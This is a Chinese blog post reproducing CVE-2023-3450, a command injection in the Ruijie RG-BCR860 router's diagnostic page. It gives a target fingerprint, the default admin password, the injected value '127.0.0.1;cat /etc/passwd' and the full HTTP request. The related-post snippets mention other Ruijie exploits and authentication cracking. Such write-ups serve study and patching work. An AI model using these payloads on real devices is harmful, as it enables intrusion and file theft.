【漏洞复现】Ruijie RG-BCR860 后台命令执行漏洞(CVE-2023-3450)

最新推荐文章于 2023-08-07 10:53:30 发布
最新推荐文章于 2023-08-07 10:53:30 发布
阅读量865 收藏
点赞数 1
分类专栏: 漏洞复现 文章标签: RuijieRG-BCR860
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46944519/article/details/132082131
版权

文章目录

前言

Ruijie RG-BCR860 2.5.13 版本存在操作系统命令注入漏洞,攻击者可通过该漏洞获取服务器敏感信息,导致服务器被沦陷。

声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

一、简介

北京星网锐捷网络技术有限公司,行业领先的ICT基础设施及行业解决方案提供商,主营业务为网络设备、网络安全产品及云桌面解决方案的研发、设计和销售。Ruijie Networks RG-BCR860是该公司的一款商业云路由器。

二、漏洞概述

Ruijie RG-BCR860 2.5.13 版本存在操作系统命令注入漏洞,该漏洞源于组件Network Diagnostic Page存在问题,会导致操作系统命令注入。

漏洞编号:CVE-2023-3450

三、影响版本

Ruijie RG-BCR860 2.5.13 版本

四、环境搭建

非开源产品,无法搭建。

指纹特征: icon_hash=“-399311436”

五、漏洞复现

该漏洞属于后台漏洞,需要输入默认密码admin进入后台
在这里插入图片描述
版本为:BCOS V2.5.10
在这里插入图片描述
点击最下角的 “网络诊断”,在"Tracert检测"的"地址"框中,输入127.0.0.1;cat /etc/passwd,接着点 击"开始检测",运行输入的命令,发现在检测框中回显了执行的命令。
在这里插入图片描述
Burp抓取命令执行的数据包如下:

GET /cgi-bin/luci/;stok=7159************************c3/admin/diagnosis?diag=tracert&tracert_address=127.0.0.1%3Bcat+%2Fetc%2Fpasswd&seq=0 HTTP/1.1
Host: 127.0.0.1:6060
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1:6060/cgi-bin/luci/;stok=7159*******************************c3/admin/diagnosis
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
Cookie: sysauth=06a17629adb3bed0a6e95d9eeec0abe6
Connection: close

在这里插入图片描述

六、修复方式

目前厂商已发布升级补丁以修复漏洞,该漏洞由于正常功能过滤不严格导致存在命令注入,并且需要高权 限账号登录操作,建议修改登录密码为强口令,通过白名单控制访问原地址。

李火火安全阁
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
锐捷路由器命令执行漏洞CVE-2023-3450)
xiaokp7的博客
09-13 851
RG-BCR860是锐捷网络推出的一款商业云路由器,它是专为酒店、餐饮、门店设计,适用带宽100Mbps,带机量可达150台,支持Sec VPM、内置安全审计模块,给商家带来更好的网络营销体验。该产品主支持全中文的WEB 界面配置,不再需要用传统的命令行进行配置,使得设备更加简单方便的进行维护和管理。RG-BCR860 2.5.13版本存在操作系统命令注入漏洞,该漏洞源于组件Network Diagnostic Page存在问题,会导致操作系统命令注入。
CVE-2023-3450:锐捷 RG-BCR860 命令执行漏洞
薛定谔嘚喵博客
09-05 1450
Ruijie RG-BCR860 2.5.13版本存在操作系统命令注入漏洞,该漏洞源于组件Network Diagnostic Page存在问题,会导致操作系统命令注入
CVE-2023-3450 锐捷Ruijie路由器命令执行漏洞
08-07 2538
RG-BCR860是锐捷网络推出的一款商业云路由器,它是专为酒店、餐饮、门店设计,适用带宽100Mbps,带机量可达150台,支持Sec VPM、内置安全审计模块,给商家带来更好的网络营销体验。该产品主支持全中文的WEB 界面配置,不再需要用传统的命令行进行配置,使得设备更加简单方便的进行维护和管理。
漏洞】锐捷RG-UAC统一上网行为管理审计系统信息泄露漏洞(CNVD-2021-14536)
Adminxe的博客
03-09 3400
0x00 前言 2021年3月8日,锐捷RG-UAC统一上网行为管理审计系统存在信息泄露漏洞,攻击者可以通过审查网页源代码获取到用户账号和密码,导致管理员用户认证信息泄露。 这个漏洞让我想到10年的审查元素大法,确实逻辑有点…… 0x01 影响范围 锐捷RG-UAC统一上网行为管理审计系统 FOFA互联网资产: title="RG-UAC登录页面" 0x02 漏洞 Ctrl+U打开网页源代码 通过访问一下路径,查看所包含的账户密码的(md5)形式 http://127..
锐捷 云课堂主机 pool 目录遍历漏洞
孤桜懶契
04-09 2888
漏洞描述 i ⭐锐捷云课堂主机存在目录遍历漏洞,通过访问get请求/pool/,即可读取目录.导致敏感信息泄露. 漏洞影响 s ✅锐捷云课堂 空间测绘 d ⭕FOFA:title="Ruijie" && "云课堂主机" 漏洞 ✅访问 http://1.1.1.1/pool目录遍历 Directory Listing For / Filename Size Last Modified Packages.gz 490.8 kb Fri, 26 May 2017 00:
锐捷rce漏洞
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-16 1003
​锐捷 rce,请求路径/guest_auth/guestIsUp.php //锐捷rce漏洞 锐捷rce漏洞文件
锐捷RG-MTFi-M520车载Wi-FI 32MB编程器固件RG- MTF1-M520-v1.1. bin-网管
06-12
锐捷RG-MTFi-M520车载Wi-Fi固件。锐捷RG-MTFi-M520 32MB编程器固件,固件版本是16WiFi的
锐捷RG-MTFi-M520车载Wi-Fi固件 32MB编程器固件
03-21
锐捷RG-MTFi-M520车载Wi-Fi固件 32MB编程器固件
RG-S3760E Series Switch Configuration Guide v10.4(2)
05-05
《RG-S3760E系列交换机配置指南v10.4(2)》是锐捷网络公司为RG-S3760E系列交换机提供的详细配置手册,适用于RGOS 10.4(2)软件版本。该文档旨在帮助网络工程师、技术销售人员以及网络管理员了解并操作这款交换机。 在...
Ruijie入侵检测部署讲解(RG-IDS)v0.1
05-04
一、IDS部署拓扑 二、IDS设备与原理简介 三、IDS部署流程与思路简介 四、交换机配置 五、IDS配置 六、管理软件的安装 七、管理软件的配置 八、IDS问题与答
锐捷-RCNP培训课件
06-20
RCNP-Routing and Switching(Ruijie Certified Network Professional)是锐捷职业资格认证中锐捷高级网络工程师职业认证。该项认证标准主要定位于锐捷网络的大、中型园区网络的规划、设计、施工以及维护与管理的...
锐捷NBR路由器命令执行漏洞
weixin_48421613的博客
05-10 5163
锐捷NBR路由器命令执行漏洞 首先先看看页面的样子 2. 这里需要注意的是,由于权限问题,厂商使用的cookie为用户名密码加密使用,什么意思呢? 经过测试,当密码输入错误的时候,部分型号nbr路由器仅能执行show version,甚至有些不能执行任何命令。但是当用户名密码正确,生成正确的cookie的时候,即可执行符合路由器规则的命令 此时可以执行上述的命令 传统武学点到为止,那么是什么导致这个命令执行漏洞产生呢? 可以看见,这里会检测系统cpu以及内存,与系统交互的时候并没有严格的过滤掉其他命令
锐捷 Smartweb管理系统 密码信息泄露漏洞
孤桜懶契
04-10 1883
漏洞描述 i ⭐锐捷网络股份有限公司无线smartweb管理系统存在逻辑缺陷漏洞,攻击者可从漏洞获取到管理员账号密码,从而以管理员权限登录。 漏洞影响 s ✅锐捷网络股份有限公司 无线smartweb管理系统 空间测绘 d ⭕FOFA:title="无线smartWeb--登录页面" 漏洞 ✅访问首页,存在账号guest/guest登陆 而且响应中包含了 admin密码的base64加密,直接全局搜索admin可以看到 访问未授权路径/web/xml/webuser-auth.
锐捷网管系统漏洞利用分析
weixin_74245209的博客
12-27 868
锐捷管理系统漏洞,利用此漏洞可获取后台密码。
漏洞情报 | 锐捷RSR路由器设备存在命令执行漏洞
爱国小白帽
04-15 3015
​ 点击上方 订阅话题 第一时间了解漏洞威胁 0x01 漏洞描述 2021年4月14日,360漏洞云监测到锐捷网络官方通告了锐捷网络RSR路由器系列产品的Web管理存在命令执行漏洞(CNVD-2021-16887),远程攻击者在未授权的情况下可执行CLI命令,攻击者可利用该漏洞获取服务器控制权限。 0x02 影响版本 产品型号 软件版本 RSR10-02E/RSR20-04E 10.4(3b35)p6 Release(224254) 及之前的版本 RSR20-14E/F 10.4(3
锐捷路由器漏洞分析
banghengxun2661的博客
05-17 3805
0x00 前言 今早看到关于锐捷路由器漏洞CNVD-2018-06947 被披露POC,对于POC进行后,继续挖掘路由器漏洞。 0x01 通过测试发POC只能执行VERSION,也就是查看版本。的截图如下: 这个命令执行只能查看版本的感觉不太过瘾,只好尝试去挖掘漏洞。 0x02 漏洞挖掘 在NBR1300G-E存在COOKIE会话固定漏洞,利用这个漏洞结...
锐捷破解
baobaoupup
08-22 584
锐捷认证有多网卡限制和使用代理服务的限制。 使用锐捷认证后,无法组件内部局域网以及使用vmware虚拟机,很不方便。 经观察,锐捷认证一分钟就检测一次。 先用 W32DASM 反汇编8021x.exe,然后查找 60EA0000, 这是因为1分钟=60000毫秒= 0x0000EA60毫秒(settimer的时间参数为UINT ) * Referenced by a (U)nco...
锐捷破号破解流程笔记
追求灵魂代码
10-15 1074
目录查看破解文件是否还在配置文件破解 查看破解文件是否还在 一、使用WinSCP登录进去 临时生成的文件的内容: 如果上述内容还在,则破解步骤正确,可能学校的网炸了。 如果缺少了文件,则需要重新配置。 配置文件破解 使用Putty登录进行mentohust测试 ...
基于stm32+FreeRTOS+ESP8266的实时天气系统
最新发布
06-22
【作品名称】:基于stm32+FreeRTOS+ESP8266的实时天气系统 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【项目介绍】:项目简介 基于stm32F407+FreeRTOS+ESP8266的实时气象站系统,通过物联网技术实时读取天气情况,温度以及自带了一个计时功能。 所需设备 stm32F407,淘晶驰串口屏,ESP8266; 串口屏连接串口3,ESP8266连接串口2,串口1用于打印状态。 实过程 通过对ESP8266发送AT指令,从服务器读取天气的json数据,然后通过cJSON解码数据,最后FreeRTOS对任务进行管理(FreeRTOS和cJSON有冲突,需要将cJSON申请内存空间的函数替换成FreeRTOS申请内存的函数,每次解码后,一定要释放内存,否则解码会卡死,而且需要把Heap_size设置稍微大一点,推荐设置为4096)
web-auth portal key ruijie
07-27
在锐捷设备上配置 Web 认证(Web Authentication)的 portal key,可以使用以下命令: ``` web-auth portal key ruijie ``` 这个命令将设置 portal key 为 "ruijie"。Portal key 是用于加密和解密 Web 认证数据的密码或密钥。在配置 Web 认证时,设备会使用 portal key 对用户身份验证过程中的数据进行加密和解密,以确保通信的安全性。 请注意,配置 Web 认证还需要进行其他相关的配置,例如配置认证服务器、认证页面等。具体配置步骤可能因设备型号和操作系统版本而有所不同。建议参考设备的官方文档或联系设备厂商获取更准确的信息和配置指导。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

李火火安全阁

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值